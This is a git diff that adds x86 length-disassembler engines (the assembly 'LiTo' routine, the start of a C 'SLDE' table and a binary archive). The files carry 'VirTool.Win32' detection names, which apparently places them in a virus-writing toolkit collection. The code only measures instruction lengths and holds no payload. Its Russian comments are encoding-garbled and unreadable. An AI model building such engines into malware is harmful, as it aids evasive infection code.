+		cmp	cl, 0A3h
+		ja	Check66h
+		test	ch, pref67h
+		jnz	incr2
+		jmp	incr4
+Check66h:	test	ch, pref66h
+		jnz	incr2
+incr4:		inc	esi
+		inc	esi
+incr2:		inc	esi
+incr1:		inc	esi
+jmp_CheckFlags:	jmp 	CheckFlags
+;-----------------------------------------------
+Prefix:		cmp 	cl, 66h
+		je 	SetF66h
+		cmp 	cl, 67h
+		jne	ExtFlags	
+SetF67h:	or	ch, pref67h
+		jmp	ExtFlags
+;-----------------------------------------------
+SetF66h:	or 	ch, pref66h
+		jmp 	ExtFlags
+;-----------------------------------------------
+ModRM:		lodsb
+		cmp 	cl, 0F7h		;Check on 0F6h and 0F7h groups
+		je 	F6F7
+		cmp 	cl, 0F6h
+		jne 	ModXX			
+F6F7:		test 	al, 00111000b		;Processing groups 0F6h and 0F7h
+		jnz 	ModXX
+		test 	cl, 00000001b
+		jz	incbt1			
+		test	ch, 1
+		jnz	incbt2	
+		inc 	esi
+		inc 	esi
+incbt2:		inc 	esi
+incbt1:		inc 	esi
+ModXX:		mov 	edx, eax		;Processing MOD bits
+		and 	al, 00000111b		;al <- only R/M bits
+		test	dl, 11000000b		;Check MOD bits
+		jz  	Mod00
+		jp  	CheckFlags		;Or c_Mod11
+		js  	Mod10
+Mod01:		test 	ch, pref67h
+		jnz 	incr1			;16-bit addressing
+		cmp 	al, 4			;Check SIB
+		je 	incr2
+		jmp 	incr1
+;-----------------------------------------------
+Mod00:		test 	ch, pref67h
+		jz 	Mod00_32		;32-bit addressing
+		cmp 	al, 6
+		je 	incr2
+		jmp 	jmp_CheckFlags
+;-----------------------------------------------
+Mod00_32:	cmp 	al, 4			;Check SIB
+		jne 	disp32
+		lodsb				;Processing SIB byte
+		and 	al, 00000111b
+disp32:		cmp 	al, 5
+		je 	incr4
+		jmp 	jmp_CheckFlags
+;-----------------------------------------------
+Mod10:		test 	ch, pref67h
+		jnz 	incr2			;16-bit addressing
+		cmp 	al, 4			;Check SIB
+		jne	incr4
+		inc 	esi
+		jmp	incr4
diff --git a/libs/VirTool.Win32.Disassembler.Dde.7z b/libs/VirTool.Win32.Disassembler.Dde.7z
new file mode 100644
index 00000000..0a2aae58
Binary files /dev/null and b/libs/VirTool.Win32.Disassembler.Dde.7z differ
diff --git a/libs/VirTool.Win32.Disassembler.Lito.asm b/libs/VirTool.Win32.Disassembler.Lito.asm
new file mode 100644
index 00000000..efbd6c3c
--- /dev/null
+++ b/libs/VirTool.Win32.Disassembler.Lito.asm
@@ -0,0 +1,398 @@
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                  ;
+;                                                                                  ;
+;                                                                      ###         ;
+;                                                                        ###       ;
+;             ###        ####################################################      ;
+;             ###        ####################################################      ;
+;             ###                      	 ###                             ###       ;
+;             ###             ###    	 ###           #########       ###         ;
+;             ###             ###    	 ###          ###########                  ;
+;             ###                    	 ###         ##         ##                 ;
+;             ###             ###    	 ###         ##         ##                 ;
+;             ###             ###    	 ###         ##         ##                 ;
+;             ###      ###    ###    	 ###         ##         ##                 ;
+;             ###      ###    ###    	 ###         ##         ##                 ;
+;             ############    ###    	 ###          ###########                  ;
+;       ################################################################	   ;            
+;                                                                                  ;
+;                                                                                  ;                                                                          
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                  ;
+;             		Advanced Length dIsassembler moTOr:)                       ;
+;                                                                                  ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                  ; 
+;                                   ‚ҐабЁп 2.1					   ;                                                
+;                                                                                  ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;дг­ЄжЁп _LiTo_                                                                    ;
+;¤Ё§ бᥬЎ«Ёа®ў ­ЁҐ ¬ иЁ­­®© Є®¬ ­¤л						   ;
+;®ЇаҐ¤Ґ«Ґ­ЁҐ ¤«Ё­л ¬ иЁ­­®© Є®¬ ­¤л                                                ;
+;‚室:                                                                             ;
+;esi -  ¤аҐб а §ЎЁа Ґ¬®© ¬ иЁ­­®© Є®¬ ­¤л                                          ;
+;edi - гЄ § вҐ«м ­  ўл室­го бвагЄвгаг (Ё«Ё ЎгдҐа) (­ §®ўҐ¬ ҐҐ INSTR:)		   ;
+;‚л室:                                                                            ;
+;ў eax - ¤«Ё­  ¬ иЁ­­®© Є®¬ ­¤л.                                                   ;
+;‡ ¬ҐвЄЁ:                                                                          ;
+;(x) ‚л室­ п бвагЄвга  (Ё«Ё ЎгдҐа) § Ї®«­пҐвбп ў Їа®жҐбᥠ¤Ё§ бᥬЎ«Ёа®ў ­Ёп      ;
+;Ё­бвагЄжЁЁ Ё ¤®«¦­  ЇаҐ¤бв ў«пвм б®Ў®© б«Ґ¤го饥:                                 ;
+;                                                                                  ;
+;	INSTR1	struct                                                             ;
+;	(+ 00) len_com		db 00h 	      ;	- ¤«Ё­  Є®¬ ­¤л;                   ;
+;	(+ 01) flags		dd 00h 	      ;	- ўлбв ў«Ґ­­лҐ д« ЈЁ               ;
+;	(+ 05) seg		db 00h 	      ;	- ᥣ¬Ґ­в (Ґб«Ё Ґбвм);             ;
+;	(+ 06) repx		db 00h 	      ;	- ЇаҐдЁЄб (0F2h/0F3h) (Ґб«Ё Ґбвм); ;
+;	(+ 07) len_offset	db 00h 	      ;	- а §¬Ґа ᬥ饭Ёп;                 ;
+;	(+ 08) len_operand	db 00h 	      ;	- а §¬Ґа ®ЇҐа ­¤ ;                 ;
+;	(+ 09) opcode 		db 00h 	      ;	- ®ЇЄ®¤ (Ґб«Ё ®ЇЄ®¤=0Fh, в®Ј¤      ;
+;					      ;	  бо¤  б®еа ­пҐвбп 2-®© ®ЇЄ®¤, Ё   ;
+;					      ;	  гбв ­ ў«Ёў Ґвбп д« Ј B_OPCODE2); ;
+;	(+ 10) modrm		db 00h 	      ;	- Ў ©в MODRM (в Є¦Ґ, Ґб«Ё Ґбвм)    ;
+;	(+ 11) sib		db 00h 	      ;	- Ў ©в SIB                         ;
+;	(+ 12) offset		db 8 dup (00h);	- ᬥ饭ЁҐ Ё­бвагЄжЁЁ              ;
+;	(+ 20) operand		db 8 dup (00h);	- ®ЇҐа ­¤  Ё­бвагЄжЁЁ              ;
+;	INSTR1	ends                                                               ;
+;                                                                                  ;
+;(е) Ї®­Ё¬ овбп (Ї®Є ) в®«мЄ® general purpose & fpu instructions                   ;
+;    (®бв «м­лҐ - ў в®ЇЄг:)!                                                       ;
+;(е) ­Ґв Їа®ўҐаЄЁ ­  ¬ ЄбЁ¬ «м­го ¤«Ё­г Ё­бвагЄжЁЁ (15 Ў ©в) (­ е७)              ;
+;(е) Љ Є Ї®бв஥­л нвЁ в Ў«ЁзЄЁ:                                                   ;
+;	Ћ—…Ќњ ЏђЋ‘’Ћ: в Є Є Є ў н⮬ ¤Ё§ б¬Ґ ЁбЇ®«м§говбп д« ЈЁ б зЁб«®ўл¬    	   ;
+;	®Ў®§­ зҐ­ЁҐ¬ <=8, в® ¤«п ®¤­®Ј® д« Ј  ¤®бв в®з­® ¬Ґбв  ў Ї®«®ўЁ­г Ў ©в     ;
+;	(¬ ЄбЁ¬ «м­®Ґ зЁб«® =8 (B_PREFIX6X) - ў ¤ў®Ёз­®¬ ЇаҐ¤бв ў«Ґ­ЁЁ =1000b).    ;
+;	‡­ п нв®, Їа®бв® вгЇ® ў ®¤Ё­ Ў ©в § ЇЁеЁў Ґ¬ 2 д« Ј  - ў®в Ё ўбҐ. ’ ЄЁ¬    ;
+;	®Ўа §®¬, Є ¦¤ п в Ў«ЁзЄ  ў 256 Ў ©в г१ Ґвбп ¤® 128.                      ;                            
+;(е) „«п 32-ЎЁв­®Ј® ЁбЇ®«­пҐ¬®Ј® Є®¤ .						   ;
+;(е) Љв® е®зҐв, Їгбвм ­ дЁЈ б ¬ Ё ¤®Ў ў«пҐв ®бв «м­лҐ Є®¬ ­¤л Ё ўбпЄЁҐ в ¬         ;
+;    Їа®ўҐаЄЁ.                                                                     ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+                                                                                   ;
+                                                                                   ;
+                                                                                   ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;				”€—€:                                              ;
+;(+) Ў §®­Ґ§ ўЁбЁ¬®бвм								   ;
+;(+) гЇ Є®ў ­­лҐ в Ў«ЁзЄЁ							   ;                                           
+;                                                                                  ;
+;(-) ¬гв®а­® ¤®Ў ў«пвм ­®ўлҐ Ё­бвагЄжЁЁ						   ;                                                                                                                                                   
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+                                                                                   ;
+                                                                                   ;
+                                                                                   ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;				€‘ЏЋ‹њ‡Ћ‚ЂЌ€…:                                     ;
+;1)Џ®¤Є«о祭ЁҐ:                                                                    ;
+;	lito.asm                                                                   ;
+;2)‚맮ў:(ЇаЁ¬Ґа)                                                                  ;
+;	lea	esi,XXXXXXXXh	; ¤аҐб Є®¬ ­¤л, змо ¤«Ё­г ­ ¤® г§­ вм		   ;              
+;	lea	edi,XXXXXXXXh	;lea edi,INSTR1					   ;
+;	call	LiTo                                                               ;                                                                                                                  
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+                                                                                   
+
+									;m1x
+							           ;pr0mix@mail.ru	
+
+_LiTo_:
+	pushad
+	call	_delta_lito_
+;===================================================================================
+
+;бва®Є  ЇаҐдЁЄб®ў
+pfx:
+db 2Eh,36h,3Eh,26h,64h,65h,0F2h,0F3h,0F0h,66h,67h
+
+SizePfx		equ $-pfx					;¤«Ё­  pfx
+
+;===================================================================================
+
+;в Ў«Ёж  д« Ј®ў ¤«п ®¤­®Ў ©в­ле ®ЇЄ®¤®ў
+TableFlags1:
+
+;  01  23  45  67  89  AB  CD  EF
+db 11h,11h,28h,00h,11h,11h,28h,00h	;00
+db 11h,11h,28h,00h,11h,11h,28h,00h      ;01
+db 11h,11h,28h,00h,11h,11h,28h,00h      ;02
+db 11h,11h,28h,00h,11h,11h,28h,00h      ;03
+db 00h,00h,00h,00h,00h,00h,00h,00h	;04
+db 00h,00h,00h,00h,00h,00h,00h,00h	;05
+db 00h,11h,00h,00h,89h,23h,00h,00h	;06
+db 22h,22h,22h,22h,22h,22h,22h,22h	;07
+db 39h,33h,11h,11h,11h,11h,11h,11h	;08
+db 00h,00h,00h,00h,00h,0C0h,00h,00h	;09
+db 88h,88h,00h,00h,28h,00h,00h,00h	;0A
+db 22h,22h,22h,22h,88h,88h,88h,88h	;0B
+db 33h,40h,11h,39h,60h,40h,02h,00h	;0C
+db 11h,11h,22h,00h,11h,11h,11h,11h	;0D
+db 22h,22h,22h,22h,88h,0C2h,00h,00h	;0E
+db 00h,00h,00h,11h,00h,00h,00h,11h	;0F
+
+
+;===================================================================================
+
+;в Ў«Ёж  д« Ј®ў ¤«п ¤ўгеЎ ©в­ле ®ЇЄ®¤®ў
+TableFlags2:
+
+;  01  23  45  67  89  AB  CD  EF
+db 11h,11h,00h,00h,00h,00h,01h,00h	;00
+db 00h,00h,00h,00h,00h,00h,00h,01h	;01
+db 11h,11h,00h,00h,00h,00h,00h,00h	;02
+db 00h,00h,00h,00h,00h,00h,00h,00h	;03
+db 11h,11h,11h,11h,11h,11h,11h,11h	;04
+db 00h,00h,00h,00h,00h,00h,00h,00h	;05
+db 00h,00h,00h,00h,00h,00h,00h,00h	;06
+db 00h,00h,00h,00h,00h,00h,00h,00h	;07
+db 88h,88h,88h,88h,88h,88h,88h,88h	;08
+db 11h,11h,11h,11h,11h,11h,11h,11h	;09
+db 00h,01h,31h,00h,00h,01h,31h,01h	;0A
+db 11h,11h,11h,11h,00h,31h,11h,11h	;0B
+db 11h,00h,00h,01h,00h,00h,00h,00h	;0C
+db 00h,00h,00h,00h,00h,00h,00h,00h	;0D
+db 00h,00h,00h,00h,00h,00h,00h,00h	;0E
+db 00h,00h,00h,00h,00h,00h,00h,00h	;0F   
+;===================================================================================
+
+SizeTbl		equ $-pfx
+;===================================================================================
+;д« ЈЁ
+;-----------------------------------------------------------------------------------
+B_NONE		equ	00h		;xex
+B_MODRM		equ	01h             ;present byte MODRM
+B_DATA8		equ	02h             ;present imm8,rel8, etc
+B_DATA16	equ	04h             ;present imm16,rel16, etc
+B_PREFIX6X	equ	08h             ;present imm16/imm32 (ў § ўЁбЁ¬®бвЁ ®в ­ «ЁзЁп ЇаҐдЁЄб  0x66 (0x67 ¤«п ®ЇЄ®¤®ў 0xA0-0xA3))
+B_SEG		equ	10h             ;present segment (ЇаЁ¬Ґа: 0x2e,0x3E, etc)
+B_PFX66		equ	20h             ;present byte 0x66
+B_PFX67		equ	40h             ;present byte 0x67
+B_LOCK		equ	80h             ;present byte LOCK (0xF0)
+B_REP		equ	100h            ;present byte rep[e/ne]
+B_OPCODE2	equ	200h            ;present second opcode (first opcode=0x0F)
+B_SIB		equ	400h		;present byte SIB
+B_RELX		equ	800h		;present jxx/jmp/call (rel8,rel16,rel32)
+;===================================================================================
+
+_delta_lito_:
+	pop	ebp
+	cld
+	xor	eax,eax
+	xor	ebx,ebx
+	cdq				        		;ў edx: dl(0/1) - ­Ґв/Ґбвм ЇаҐдЁЄб 0x66
+	                                                        ;	dh(0/1) - ­Ґв/Ґбвм ЇаҐдЁЄб 0x67
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG Ї®ЁбЄ ЇаҐдЁЄб®ўxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_nextpfx_:					
+	lodsb                                			;Ї®«гз Ґ¬ ®зҐаҐ¤­®© Ў ©в Є®¬ ­¤л
+	push	edi
+	lea	edi,[ebp+(pfx-_delta_lito_+SizeTbl)]            ;ў edi -  ¤аҐб бва®ЄЁ ЇаҐдЁЄб®ў
+	db	6Ah,SizePfx
+	pop	ecx
+	repne	scasb                                           ;Ґбвм «Ё ў а §ЎЁа Ґ¬®© Є®¬ ­¤Ґ ЇаҐдЁЄбл?
+	pop	edi
+	jne	_endpfx_                                        ;­Ґв? - ­  ўл室
+	cmp	ecx,5
+	jl	_lock_
+	or	bl,B_SEG
+	mov	byte ptr [edi+05h],al				;seg
+_lock_:
+	cmp	al,0F0h
+	jne	_rep_
+	or	bl,B_LOCK
+_rep_:
+	mov	ch,al
+	and	ch,0FEh
+	cmp	ch,0F2h
+	jne	_66_
+	or	bx,B_REP
+	mov	byte ptr [edi+06h],al				;rep
+_66_:
+	cmp	al,66h                                          ;Ё­ зҐ ᬮваЁ¬, нв® 0x66?
+	jne	_67_
+	mov	dl,1
+	or	bl,B_PFX66
+_67_:
+	cmp	al,67h                                          ;Ё­ зҐ, нв® 0x67?
+	jnz	_nextpfx_                                       ;Ґб«Ё ­Ґв, в® ЁйҐ¬ ¤агЈЁҐ ЇаҐдЁЄбл
+	mov	dh,1
+	or	bl,B_PFX67
+	jmp	_nextpfx_                                       ;Їа®¤®«¦ Ґ¬ Ї®ЁбЄ
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND Ї®ЁбЄ ЇаҐдЁЄб®ўxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_endpfx_:
+_search_jxx_call_jmp_:
+	mov	ch,al
+	and	ch,0FEh
+	cmp	ch,0E8h
+	je	_jxxok_		
+	mov	ch,al
+	and	ch,11110000b
+	cmp	ch,70h
+	je	_jxxok_
+	cmp	al,0EBh
+	je	_jxxok_
+	cmp	al,0Fh                                        	;®ЇЄ®¤ б®бв®Ёв Ё§ 2-е Ў ©в?
+	jne	_opcode_
+	lodsb                                                   ;Ґб«Ё ¤ , в® ЎҐаҐ¬ 2-®© Ў ©в ®ЇЄ®¤ 
+	mov	cl,80h                                          ;Ё 㢥«ЁзЁў Ґ¬ cl=80h
+	or	bx,B_OPCODE2
+	mov	ch,al
+	and	ch,11110000b
+	cmp	ch,80h
+	jne	_opcode_
+_jxxok_:
+	or	bx,B_RELX
+
+;-----------------------------------------------------------------------------------
+_opcode_:
+	xor	ch,ch
+        mov	byte ptr [edi+09h],al				;save first opcode
+	lea	ebp,[ebp+ecx+(TableFlags1-_delta_lito_+SizeTbl)];ў edi -  ¤аҐб ­г¦­®© в Ў«Ёжл д« Ј®ў(е а-Є)
+	cmp	al,0A0h                                         ;Ґб«Ё ®ЇЄ®¤>=0xA0 Ё ®ЇЄ®¤<=A3,
+	jl	_01_;jb                                            ;
+	cmp	al,0A3h
+	jg	_01_
+	test	cl,cl
+	jne	_01_;je                                 	;в® dl=dh
+	mov	dl,dh						;mov	dl,dh
+;-----------------------------------------------------------------------------------
+_01_:
+	push	eax
+	shr	eax,1
+	mov	cl,byte ptr [ebp+eax]				;ў cl - д« ЈЁ Є®¬ ­¤л
+	jc	_noCF_
+	shr	cl,4
+_noCF_:
+        and	cl,0Fh
+	xor	ebp,ebp				        	;ў ebp - Ўг¤Ґв еа ­Ёвмбп ¤«Ё­  ᬥ饭Ёп(offset)
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG а §Ў®а MODRMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+        or	ecx,ebx
+	pop	ebx						;bl=opcode
+	test	cl,B_MODRM                                      ;ЇаЁбгвбвўгҐв «Ё Ў ©в modrm?
+	je	_endmodrm_                                      ;­Ґв? ­  ўл室
+	lodsb                 	  				;al=modrm
+	mov	byte ptr [edi+10],al				;MODRM
+	mov	ah,al
+;-----------------------------------------------------------------------------------
+	shr	ah,6   						;ah=mod
+;-----------------------------------------------------------------------------------	
+	test	al,38h    					;¤ «ҐҐ ᬮваЁ¬, а ў­® «Ё Ї®«Ґ reg==0?
+	jne	_03_
+	sub	bl,0F6h                                         ;Ґб«Ё ¤ , ⮠ᬮваЁ¬ ­  ®ЇЄ®¤:
+	jne	_02_                                            ;а ўҐ­ «Ё ®­ 0xF6 Ё«Ё 0xF7(test)?
+	or	cl,B_DATA8                                      ;Ґб«Ё ¤ , в® гбв ­ ў«Ёў Ґ¬ ­г¦­л© д« Ј
+_02_:
+	dec	ebx
+	jne	_03_
+	or	cl,B_PREFIX6X
+;-----------------------------------------------------------------------------------	
+_03_:
+	and	al,07h
+	xor	ebx,ebx                                         ;bl ®вўҐз Ґв §  ЇаЁбгвбвўЁҐ Ў ©в  sib
+	mov	bh,ah                                           ;bh=mod
+	cmp	dh,1                                      	;Ґбвм «Ё ў а §ЎЁа Ґ¬®© Є®¬ ­¤Ґ ЇаҐдЁЄб 0x67?                            		
+	je	_mod00_                                         ;Ґб«Ё ¤ , в® ЇҐаҐбЄ ЄЁў Ґ¬
+	cmp	al,4                                            ;Ё­ зҐ Їа®ўҐа塞,а ў­® «Ё Ї®«Ґ rm==4?
+	jne	_mod00_
+	inc	ebx                                             ;Ґб«Ё ¤ , в® ў®§¬®¦­® Ґбвм sib
+;-----------------------------------------------------------------------------------
+_mod00_:
+	test	ah,ah                                           ;Ї®«Ґ mod==0?
+	jne	_mod01_
+	dec	dh                                      	;ᮤҐа¦Ёв «Ё Є®¬ ­¤  0x67?						
+	jne	_nop67_	                                        ;­Ґв? ЇҐаҐбЄ ЄЁў Ґ¬
+	cmp	al,6                                            ;Ґб«Ё ¤ , в® rm==6?
+	jne	_sib_
+	inc	ebp                                             ;Ґб«Ё ¤ , в® ¤«Ё­  ᬥ饭Ёп=2(16 bit)
+	inc	ebp
+_nop67_:
+	cmp	al,5                                            ;Ё­ зҐ, rm==5?
+	jne	_sib_
+	add	ebp,4                                           ;Ґб«Ё ¤ , в® ¤«Ё­  ®ддбҐв =4 (32 bit)
+	jmp	_sib_                                           ;Ё¤Ґ¬ ¤ «миҐ
+;-----------------------------------------------------------------------------------		
+_mod01_:		                                        ;mod==1?
+	dec	ah                                              
+	jne	_mod02_
+	inc	ebp                                             ;¤ ? в®Ј¤  ebp=1
+	jmp	_sib_		
+;-----------------------------------------------------------------------------------	                        
+_mod02_:                                    			;mod==2?
+	dec	ah
+	jne	_mod03_
+	inc	ebp             				;ebp=2
+	inc	ebp
+	dec	dh                                      	;Ґб«Ё Ґбвм ЇаҐдЁЄб  0x67, ЇҐаҐбЄ ЄЁў Ґ¬ ¤ «миҐ
+	je	_sib_
+	inc	ebp                                             ;в® ebp+=2
+	inc	ebp          	
+	inc	ebx
+;-----------------------------------------------------------------------------------
+_mod03_:                                                        ;mod==3?
+        dec	bl                                              ;Ґб«Ё ¤ , в®Ј¤  sib'  в®з­® ­Ґв!
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND а §Ў®а MODRMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG Ї®«г祭ЁҐ SIBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_sib_:
+	dec	bl                                              ;Ґбвм «Ё Ў ©в sib?
+	jne	_endmodrm_
+	or	cx,B_SIB
+	lodsb                                                   ;Ґб«Ё ¤ , в® ў al ⥯Ґам «Ґ¦Ёв sib(al=sib) 
+	mov	byte ptr [edi+11],al				;SIB
+	and	al,7                                            ;¤ «ҐҐ, 
+	cmp	al,5                                            ;al==5?
+	jne	_endmodrm_
+	test	bh,bh                                           ;Ґб«Ё ¤ , ⮠ᬮваЁ¬, Ї®«Ґ mod==0?
+	jne	_endmodrm_
+	push	4                                               ;Ґб«Ё ¤ , в® Ґбвм 4-Ў ©в®ў®Ґ ᬥ饭ЁҐ
+	pop	ebp
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND Ї®«г祭ЁҐ SIBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG д« ЈЁxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_endmodrm_:
+        xor	ebx,ebx
+	test	cl,B_DATA8                                  	;Ґбвм «Ё ®¤­®Ў ©в®ў®Ґ ᬥ饭ЁҐ?
+	je	_nf1_
+	inc	ebx
+_nf1_:
+	test	cl,B_DATA16                                     ;Ґбвм «Ё ¤ўгеЎ ©в®ў®Ґ ᬥ饭ЁҐ?
+	je	_nf2_
+	inc	ebx
+	inc	ebx
+_nf2_:
+	test	cl,B_PREFIX6X                                   ;Ґбвм «Ё ў Є®¬ ­¤Ґ ­ҐЇ®б।б⢥­­®Ґ §­ зҐ­ЁҐ?
+	je	_endflag_
+	dec	dl					;Ґбвм «Ё 0x66(0x67 ¤«п [0xA0,0xA3]) ў а §ЎЁа Ґ¬®© Є®¬ ­¤Ґ?                                              
+	je	_okp66_
+	inc	ebx
+	inc	ebx
+_okp66_:
+        inc	ebx
+        inc	ebx
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND д« ЈЁxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_endflag_:
+        push	ecx
+        push	edi
+        mov	ecx,ebp
+        add	edi,12
+        rep	movsb	
+        sub	edi,ebp
+        add	edi,8
+        mov	ecx,ebx
+        rep	movsb
+        pop	edi
+	pop	dword ptr [edi+1]
+	sub	esi,dword ptr [esp+4];eax
+	xchg	esi,eax
+	mov	byte ptr [edi+0],al
+	mov	dword ptr [esp+7*4],eax                         ;б®е࠭塞 а §¬Ґа ў Ґ е
+	xchg	ebp,eax
+	mov	byte ptr [edi+7],al
+	mov	byte ptr [edi+8],bl	
+	popad
+	ret	                                               	;ўл室Ё¬:)
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;Љ®­Ґж дг­ЄжЁЁ _LiTo_                                                              ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+
+SizeOfLiTo	equ $-_LiTo_					;а §¬Ґа дг­ЄжЁЁ _LiTo_
diff --git a/libs/VirTool.Win32.Disassembler.SLDE.a b/libs/VirTool.Win32.Disassembler.SLDE.a
new file mode 100644
index 00000000..d37d55fb
--- /dev/null
+++ b/libs/VirTool.Win32.Disassembler.SLDE.a
@@ -0,0 +1,90 @@
+
+                                /*  yaav */
+                           
+                               /* SLDE 0.1v */
+/* This is simple lengh disassembler engine for IA32 x86 instruction set.The code is
+Operation System independent. For now it supports only the most used one byte
+ opcodes(without few rarely used opcodes)but i will expand it in future :)
+  Credits goes to Benny- and Napalm. Thanks guys :) */ 
+
+#define Prefix 5
+#define ModRMy 1
+#define ModRMn 0
+#define Imm08 8
+#define Imm32 32 /*16/32 bit Imm*/
+#define ModRM 3 /*Unknown Opcode*/
+
+unsigned char Array[] = "\x67\x66\x81\x05\x11\x11\x00\x00\x11\x11";
+unsigned char ModRMTable[] = {
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /*00..07*/
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 08..0F*/    
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 10..17 */   
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 18..1F */
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 20..27 */
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 28..2F */
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 30..37 */
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 38..3F */
+ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,  /* 40..47 */
+ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 48..4F */
+ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 50..57 */
+ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 58..5F */
+ModRMn,ModRMn,ModRMy,ModRMy,Prefix,Prefix,Prefix,Prefix, /* 60..67 */
+ModRMn+Imm32,ModRMy+Imm32,ModRMn+Imm08,ModRMy+Imm08,ModRMn,ModRMn,ModRMn,ModRMn, /* 68..6F */
+ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* 70..77 */
+ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* 78..7F */
+ModRMy+Imm08,ModRMy+Imm32,ModRMy+Imm08,ModRMy+Imm08,ModRMy,ModRMy,ModRMy,ModRMy, /* 80..87 */
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy, /* 88..8F */  
+ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /*90..97 */
+ModRMn,ModRMn,ModRM/*9A Unknown */,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,  /* 98..9F */
+ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn,ModRMn,ModRMn,ModRMn, /* A0..A7 */
+ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* A8..AF */
+ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* B0..B7 */
+ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32, /* B8..BF */
+ModRMy+Imm08,ModRMy+Imm08,ModRM /* RET WORD */,ModRMn,ModRMy,ModRMy,ModRMy+Imm08,ModRMy+Imm32, /* C0..C7 */
+ModRM /* C8 Unknown */,ModRMn,ModRM /* RET WORD */,ModRMn,ModRMn,ModRMn+Imm08,ModRMn,ModRMn, /* C8..CF */
+ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm08,ModRMn,ModRMn, /* D0..D7 */
